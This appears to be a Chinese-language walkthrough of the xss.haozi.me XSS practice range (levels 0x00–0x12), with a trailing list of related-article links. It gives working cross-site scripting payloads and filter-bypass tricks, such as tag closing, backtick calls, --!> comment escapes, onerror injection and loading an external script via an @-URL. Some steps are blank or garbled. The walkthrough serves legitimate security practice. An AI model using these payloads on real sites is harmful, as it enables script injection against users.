一、0x00

<script>alert(1);</script>

二、0x01

想办法闭合<textarea>

</textarea><script>alert(1);</script>

三、0x02

闭合input

"><script>alert(1);</script>

四、0x03

server code显示将()括号转义为空,因此用反引号代替括号

<script>alert`1`;</script>

五、0x04

server code显示()和反引号均被转义,考虑用unicode编码转换()为

()

将其在标签内写入可实现转码,标签外不支持转码操作

<body onload="alert(1);">

六、0x05

写入的内容被注释掉,且-->被替换为表情包。需要将注释符闭合掉,--!>也可以作为注释结束。

--!><script>alert(1);</script>

七、0x06

/*****

/auto|on.*=|>/ig

i表示不区分大小写;

auto|on表示匹配auto或者on;

.表示匹配除换行符外的任意字符;

*表示匹配任意长度;

onmouseover 事件会在鼠标指针移动到指定的元素上时发生。

*****/

server code可以得到“auto”或“on”开头➕任意长度或字符➕“=”会被替换为“_”,

但“.”无法匹配换行符,因此可加入一个换行符打断施法。

八、0x07

/<\/?[^>]+>/gi

/****

\表示转义,将/转义为它本身;

?表示前面的字符可有可无;

[^>]代表除了>字符外全都匹配;

+代表前面一个字符可出现多次;

*****/

由于js语言结构兼容性高,不闭合也能实现功能,为避免转义,可选择性的将转义字符去掉不实现闭合。

九、0x08

/<\/style>/ig

转义</style>标签,多加一个空格绕过转义

</style >
<script>alert(1);</script>

十、0x09

/^https?:\/\/www\.segmentfault\.com/

/****

正则表达式中^表示必须以后面那个字符开头;

****/

转义的页面不是脚本,使用onerror

https://www.segmentfault.com" onerror="alert(1);

十一、0x0a

https://www.segmentfault.com

加一个@,将前边的部分作为身份认证信息而不是网址,后面真正的网址指向alert(1)

https://www.segmentfault.com@xss.haozi.me/j.js

十二、0x0b

/*** html语言不区分大小写,js语句区分大小写 ***/

server code将输入都转换为大写,因此可同上引入外部文件http://xss.haozi.me/j.js

<script src="https://xss.haozi.me/j.js"></script>

十三、0x0c

用body onload代替script,并标签内unicode编码

<body onload="alert(1);">

十四、0x0d

想办法注释

十五、0x0e

十六、0x0f

想办法闭合(标签内可进行unicode编码转换)

十七、0x10

不用管window.data是什么东西,直接闭合它绕过,然后输入

十八、0x11

/*****

ar a = document.createElement('a')  //生成一个标签aocument.body.appendChild(a)    //将上面生成的元素a添加到body标签内

****/

/****通过程序往标签内添加内容和直接往标签里写没有区别 ;

标签内会进行转义,因此不用管server code里面的字符转义

***/

先闭合原本的url后面的js语句,然后写入

十九、0x12

server code中第一个\是给第二个\进行转义的,因此要闭合console.log需要\\进行转义,代表输出一个\

xss.haozi.me相关推荐

  1. xss靶场、xss.haozi.me靶场详细通关教程

    文章目录 前言 预备知识 HTML编码 img的可拓展 各种payload形式 0x00 0x01 0x02 0x03(使用了正则过滤圆括号) 其它解法 0x04(使用正则过滤圆括号和反引号) 0x0 ...

  2. xss.haozi.me通关教程

    10.xss.haozi.me通关教程 0x00 首先整体浏览网站 分别是xss注入点,注入后的HTML代码以及网页源码 构造常规payload: <script>alert(1)< ...

  3. xss.haozi 思路总结 0x00-0x12

    xss刷题网站2 https://xss.haozi.me/ 一个非常可爱的网站.这是网站界面,题目序号是十六进制,一共19道题. 0x00 直接输入<script>alert(1)< ...

  4. xss绕过字符过滤_XSS绕过实战练习

    前言 写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下.有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战 ...

  5. XSS表情包靶场通关记录

    平台 alert(1)https://xss.haozi.me 0X00 源码无防护,直接常规payload绕过 <script>alert(1)</script> <s ...

  6. switchyomega插件_CTF|你所关注的CTFer都在用的插件合集【附:XXE补给+CTF训练集】...

    不看后悔系列,建议收藏 相信大家对 CTF 都不陌生了,今天为大家带来了一系列 CTF 必备 Chrome 插件. CTF 可能很多人想学 CTF,但又怕零基础学不懂.其实,CTF 并没有那么难. C ...

  7. 总结-各种安全漏洞学习环境集合(转)

    在平时工作生活以及学习中,遇到了各种安全漏洞实验环境.本着方便自己方便他人的思想,我简单的将其收集一些.可能不全面,后续还会继续补充,希望能帮助初学安全的人,能为其提供一个好的动手环境. 1.uplo ...

  8. 全!CTF靶场、渗透实战靶场总结 (适合收藏)

    CTF靶场.渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门.提升自己.丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯): 渗透实战靶场: ...

  9. 使用data伪协议绕过圆括号、反引号被过滤

    文章目录 data协议常用数据格式 不使用编码的方式绕过圆括号过滤 data协议常用数据格式 不使用编码的方式绕过圆括号过滤 环境是https://xss.haozi.me/#/0x04 ,其中代码过 ...

  10. 记录个人web测试总结经验

    快捷栏 漏洞 17年OWASP TOP10漏洞 常见的Web安全漏洞 Sql注入 注入类型 Sql原理: Sql注入产生的原理条件: XSS XSS分类:反射型.存储型.dom型 Xss原理: 三个类 ...

最新文章

  1. 006-spring cloud gateway-GatewayAutoConfiguration核心配置-GatewayProperties初始化加载、Route初始化加载...
  2. python退出程序-Python程序退出方式小结
  3. 网络上经典的DOS小命令
  4. oracle rac alter日志,ORACLE 11G RAC 增加日志组及增大日志文件
  5. Mysql更改表名大小写不敏感
  6. C++提高部分_C++函数模板的概念---C++语言工作笔记080
  7. 利用根轨迹法进行控制系统的分析和设计
  8. WinForm软件开机自动启动详细方法
  9. 423.从英文中重建数字
  10. 一句一句的读ArrayList源码(代码基于JDK11)
  11. 怎么搜索代码里的所有中文汉字
  12. 解决仙剑奇侠传“应用程序无法正常启动(0xc000000d)”的问题【转载】
  13. matlab求解零输入响应,matlab求解零状态零输入响应
  14. Jenkins+GitLab+Docker持续集成LNMP
  15. Android多窗口模式(分屏模式)
  16. 机器学习|切比雪夫、辛钦和贝努里大数定律|15mins入门|概统学习笔记(十四)
  17. 不要一个人吃饭---人脉就是钱脉
  18. GPT分区相关的操作
  19. DSP RS232 RS485通信
  20. python考证书-Python全国二级等级考试(2019)

热门文章

  1. 【转帖】刘备三顾茅庐,请Elasticsearch出山
  2. c++智能指针转化:static_pointer_cast、dynamic_pointer_cast、const_pointer_cast、reinterpret_pointer_cast
  3. R语言绘制bivariate polar plots
  4. 基于ARM的嵌入式SMTP远程控制设计
  5. CSS3制作圆角图片和椭圆形图片
  6. 四叶草关闭啰嗦模式_真正的高性能车!Giulia 四叶草评测
  7. NYOJ 1132 promise me a medal (判断两线段是否相交)
  8. 1916 Problem C 合唱队形
  9. linux的input命令,通过xinput命令在Manjaro中启用Tap-to-click功能的方法
  10. 古城钟楼微博地支报时程序铛,100行代码实现